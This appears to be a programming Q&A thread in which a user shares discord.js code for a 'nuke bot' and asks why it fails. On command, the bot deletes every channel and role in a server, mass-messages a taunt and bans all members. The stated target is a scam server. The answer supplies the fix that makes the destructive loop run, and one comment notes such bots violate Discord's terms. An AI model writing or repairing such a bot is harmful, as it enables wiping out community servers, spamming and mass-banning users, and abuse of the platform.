# how to delete all channel in discord.js server

Tags: javascript, node.js, discord.js

I'm gonna make a nuke bot to nuke a scam server I've tried many things but won't work this is my current code

```js
const Discord = require('discord.js')
const client = new Discord.Client()

client.on('ready', function(){
    console.log("nukebot is ready")
})

client.on('message', function(message){
    if(message.content === "S#NUKE") {
        message.channel.send('@everyone')
        message.guild.channels.forEach(channel => channel.delete())
        message.guild.roles.forEach(role => role.delete())
        message.guild.member.forEach(member => member.send('GET BANNNED AND NUKED BY AMONGUS NUGGET GROUP')).catch(console.error())
        message.guild.member.forEach(member => member.ban()).catch(console.error())
    }
})

client.login('API_KEY_REDACTED')
```

This gave me an error: `message.guild.channels.forEach is not a function`

Comment: It's channels.cache

Comment: also just keep in mind that nuke bots are against discord tos and you might get banned if you use yours

Answer (score 0):

`message.guild.channels.forEach()` should be `message.guild.channels.cache.forEach()`.
They added that update in v12.